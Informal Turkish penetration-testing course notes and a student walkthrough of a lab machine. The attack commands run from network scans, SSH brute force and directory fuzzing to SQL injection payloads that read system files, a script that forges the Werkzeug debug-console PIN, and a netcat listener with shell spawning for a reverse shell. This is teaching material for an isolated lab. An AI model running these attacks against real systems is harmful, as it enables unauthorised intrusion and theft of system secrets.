Açıklık Tarama Ve Sızma Testi 2. Hafta (Makine 3 pin Çözümü Yorumlarda))

Ali Burak

1. Ders Notları

Pentest Aşamları

1. Aşama Keşif ; Aktif(Etkileşim var) , Pasif (Etkileşim Yok)
2. Aşama Tarama(Enumation) ; Çalışan servisler

Çalışan servisler; Port taraması (21 Ftp, 22 SSH , 23 Telnet, 53 DNS , 80 Http, 139 SMB , 443 HTTPS , 445 SMB , 3306 MYSQL) nmap ile tarama yapılır.
nmap -p- 192.168.145.129

Dipnot: Ftp servislerinin varsayılan girişlerini genelde kapatmayı unuturlar. ftp nin varsıyalan giriş kullanıcı adı ve şifresi "Anonymous" dur
ftp ftp.example.com
Name (ftp.example.com:youruser): Anonymous
Password: Anonymous

Web arayüzunden inceleme

Sayfa Kaynağını incele,

Sqlenjection attacklarına bak

Fuzzing yapılacak (Gizli klasorlerın taranması) ; fufuf,drib,dirbuster,getbuster gibi araçlar kullanılır.

Dipnot: Aşağıdaki sistem harici olusan kullanıcıları verdi.
cat /etc/passwd |grep zsh

3. Erişim sağlama

Ali Burak

2. Ders Notları

Ova1 Sunucu Açıklıkları

1 - Karşı pc ip adresini tesbit et.

sudo netdiscover -i eth0 -r 192.168.238.0/24

Dosya İzinleri
Dosya izinleri Linux'ta üç ana kategoriye ayrılır: sahip (owner), grup (group) ve diğer (others) kullanıcılar için.
drwxrwx--w-

Find Komutu
find / -perm -u=s 2>/dev/null

Dizin Yapısı ve CD Kullanımı

Path yolu
Path yolu, sistemin komutları hangi dizinlerde arayarak çalıştıracağını belirler. Örneğin, ls komutunun içeriği değiştirilebilir. Eğer ls komutunu /tmp dizinine yerleştirirseniz ve /tmp'yi $PATH'e eklediğinizde, artık ls komutu /tmp dizinindeki sürümle çalışır.

Path Yolu Nasıl Görünür?
Konfigürasyon dosyalarındaki çevresel değişkenleri görmek için:

env
Sadece $PATH'i görmek için:

echo $PATH
Komutlar, sırayla $PATH'teki dizinleri gezerek bulunur ve çalıştırılır. Örneğin, aşağıdaki komutla /tmp dizinini PATH'e ekleyebilirsiniz:

export PATH=/tmp:$PATH
Bu durumda, /tmp dizinine koyduğunuz bir ls komutu, oradaki sürümle çalışacaktır.

Kısa bir terar

ifconfig ile kendi ip adresini öğren not et.
ifconfig
Ip taraması yap ve hedef makinayı tesbit edip ıp adresini not et.
netdiscover -i eth0 -r 192.168.238.0/24
Site haritasını çıkart arayüzünü ve dosyaları incele kullanıcı adlarını ve sıfreleri not et.
dirp http://192.168.238.130
Kullanıc giriş sayfasını bulduğunda sql enjecte saldırsını dene
Kullanıcı adı girişi: ' or 1=1 --

Ali Burak

3. Ders

belirlediğin url adresınde geçen tüm kelimleri satır satır txt dosyasına yazar.

cewl http://url -w kelimeler.txt

/usr/share/wordlists/ bu yol içerisinde ruckyou var onu masaüstüne al ne işe yaradığını öğren.

hydra -L Desktop/user -P Desktop/sifre -f 192.168.145.129 ssh

ffuf -u http://192.168.238.130/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 10701 -e .txt

gbodja kullanıcısna bağlandıktan sonra
sudo -l yaptığmızda nopasswd: /ust/bin/git yoluna şifresiz girme yetkisi verildiği görülür.
sudo -l

Ali Burak

4. Ders

Ali Burak

//harita taraması yap
nmap -Pn -A 192.168.238.131

sqlmap --help
// tarama yapıcak ve sql kaynagı ogrenılecek
sqlmap -u "192.168.238.131:8000/dowload?id=1"

// yes no ile uğraşmak istemiyorsan

sqlmap -u "192.168.238.131:8000/dowload?id=1" --batch

// veri tabanını şndşrmek için
sqlmap -u "192.168.238.131:8000/dowload?id=1" --batch --dumb

drib http://ip:8000/

// seclisti indir sudo apt seclists
ffuf -u "http://192.168.23.134:8000/download?fuzz=1" -w /usr/share/wordlists/dirbuster/direcorty-list

ffuf -u "http://192.168.23.134:8000/download?fuzz=1" -w /usr/share/wordlists/dirbuster/direcorty-list fs-20
burdan id buldu id denmesi gerektiğini

hacktrich burada örnek kodlar var burada pin ile alaklaı oolana giriş yaodı kodu ve linuxda
nano a.py acıp içine kaydetti. daha sonra pyhonu calıstırdı. kodu aldı
buradki koda alınması gereken verileri sql enction ile url kısmına veriler girilerek o değişkenleri bulup yerine koycaksın sonra makinenin içine girmiş olacağız. ondan sonra root kısmı kalıcak.

url kısmına resim indirme linkinde olmayan bir resim id girdi.

Ali Burak

https://hacktricks.boitatech.com.br/pentesting/pentesting-web/werkzeug
Pin üretmek için gerekli komutları baktığımız site.

import hashlib
from itertools import chain
probably_public_bits = [
'web3_user',# username
'flask.app',# modname
'Flask',# getattr(app, 'name', getattr(app.class, 'name'))
'/usr/local/lib/python3.5/dist-packages/flask/app.py' # getattr(mod, 'file', None),
]

private_bits = [
'279275995014060',# str(uuid.getnode()), /sys/class/net/ens33/address
'd4e6cb65d59544f3331ea0425dc555a1'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
#h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num

print(rv)``

Mert Eren

1 adım:

kendi ip adresimi ifconfigkomutu ile öğrendim ip adresim: 192.168.238.129

karşıt makinenin ip adresini öğrenmek içinsudo netdiscover -i eth0 -r 192168.238.0/24komutunu kullandım. karşıt makinenin ip adresi : 192.168.238.131 .

2. adım:

nmap -p- 192.168.238.131komutu ile açık portların tespiti yapıldı .
ssh http ve tcp portlarının açık olduğu öğrenildi.
dirb http://192.168.238.131:80 komutu ile taratılmaya başlanadı.
80 portu taratıldı fake olduğu anlaşıldı.
8000 portu taratılmaya başlandı consol bulundu pin ama istiyor .
site url adresinde id değerleri değiştirilerek verdiği hatadan Sql injekte açığı tespit edildi.

3.adım:

sqlmap -u "http://192.168.238.131:8000/download?id=1" --dbs komutu kullanılarak "elves ve information_schema" adında 2 adet database bulundu.
sqlmap -u "http://192.168.238.131:8000/download?id=1" -D elfimages -tables komutu kullanılarak elves database içindeki tablolar bulundu.
sqlmap -u "http://192.168.238.131:8000/download?id=1" -D elfimages -tables elves --columns komutu kullanılrak elves tablosunun içindeki veriler bulundu.
aynı komutlar

Mert Eren

1. Şama Kendi Ipni öğren
	ifconfig
Kendi Ip :192.168.238.129  

2. Aşama karşı pcyi bul
	nmap 192.168.238.0/24  
	sudo netdiscover -i eth0 -r 192.168.238.0/24
	Hedef PC:192.168.238.131

3. Aşama açık portları tesbit et. 
	nmap -p- 192.168.238.131 
4. Aşama url dizinin tesbiti
	
	dirb http://192.168.238.131
	dirb http://192.168.238.131:8000
5. Aşama açılan urlden siteyi incele
	sayfa kaynağını incele	
	sql hatası ara
	SAyfa başlığındaki  adamı araşıtır. 
		http://192.168.238.131:8000/console
		http://192.168.238.131:8000/download
		http://192.168.238.131:8000/
		
	https://hacktricks.boitatech.com.br/pentesting/pentesting-web/werkzeug
	
6.Adım Dowload url bulma
	http://192.168.238.131:8000/console bu kaynak kodundan
		<a href="/download?id=1">
		
	sonuç : 
		http://192.168.238.131:8000/download?id=1
7 adım sql enjecte adımı ile sona ' attık ve  sqli sonladırdık aldığımız hatadan 
	yeni url bulduk
		http://192.168.238.131:8000/download?id=1' 
		
		/home/mcskidy/.local/lib/python3.7/site-packages/flask/app.py
		Kullanıcı adı: mcskidy  olduğunu öğrendik
8. Adım web arastırmalardam sonra 
		https://hacktricks.boitatech.com.br/pentesting/pentesting-web/werkzeug
		içeriisndeki kodu al ve
		nano pin.py içerisine kaydet ve pyhton ile çalıştır
		
9. Adım kodu editleme
		Kullanıcı adı: mcskidy 
		
	probably_public_bits = [
    'web3_user',  # Kullanıcı adı  = mcskidy 
    'flask.app',  # Flask modülü adı  
    'Flask',  # Flask sınıfının adı
    '/usr/local/lib/python3.5/dist-packages/flask/app.py' # Flask modülünün dosya yolu
	= yeni url 7 adımdan =>  /home/mcskidy/.local/lib/python3.7/site-packages/flask/app.py
]
9.1 Adım MAc id  hackedecimal biçimde bulma
	http://192.168.238.131:8000/download?id=-1' union select 'file:////proc/net/arp';--  
	gönder. gelen  download'u açtık ve açılan sayfanın kaynak kodda  Device  verdi. aldığımız device
	ismi ile "ens33"  yeni bir url doldurduk.
	sonuç: 
	http://192.168.238.131:8000/download?id=-1' union select 'file:////sys/class/net/ens33/address';--  
	gelen  download'u açtık ve açılan sayfanın kaynak kodda mac adresini aldık
10 adım mac adresi hexedesimal çevirme
	print(0xMAC) # aradakı : leri sil.
	sonucu al. 
	

private_bits = [
    '279275995014060',  # Cihazın MAC adresi  buraya yapıştır.
    'd4e6cb65d59544f3331ea0425dc555a1'  # Sistem kimliği (/etc/machine-id dosyasından)
]

11. ADım site kimliği bulma (/machine-id) bulma
	get_machine_id(), /etc/machine-id
	
	http://192.168.238.131:8000/download?id=-1' union select 'file:////etc/machine-id';--  
	gelen  download'u açtık ve açılan sayfanın kaynak kodda machine id  adresini aldık

	private_bits = [
    '279275995014060',  # Cihazın MAC adresi  buraya yapıştır.
    'd4e6cb65d59544f3331ea0425dc555a1'  # Sistem kimliği > buraya yapıştır.
]
	
pyhtone koda h = hashlib.md5()  burayı sha1 yap sonra siteden yine 
 
/proc/self/cgroup komutu al  enjecte et ve indir bak içine 
burada app.service komutunual ve kopya macin idnin sonuna yapıştır.
	
	 CONSOLE_MODE = true,
          EVALEX = true,
          EVALEX_TRUSTED = true,
          SECRET = "xV1eOSVKC3oM3WpAPXpz";
	
	
	
	
	
	
	
	
	/home/mcskidy/.local/lib/python3.7/site-packages/MySQLdb/connections.py"
	
	
	
	
	
	
	
	
	
	
	
	
	

/home/mcskidy/.local/lib/python3.7/site-packages/flask/app.py


secret : xV1eOSVKC3oM3WpAPXpz

Kullanıcı adı: mcskidy

pin.py


import hashlib
from itertools import chain
probably_public_bits = [
    'mcskidy',# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/home/mcskidy/.local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
    '52243044290',# str(uuid.getnode()),  /sys/class/net/ens33/address
    'ee7c76250d01482e8320fef17f50ab64app.service'# get_machine_id(), /etc/machine-id
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
#h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

print.py
print(0x000c29ed97c2)

Ali Burak

python3 -c "import pty;pty.spawn('/bin/bash')"

Ali Burak

https://www.revshells.com/
└─PS> nc -nvlp 1234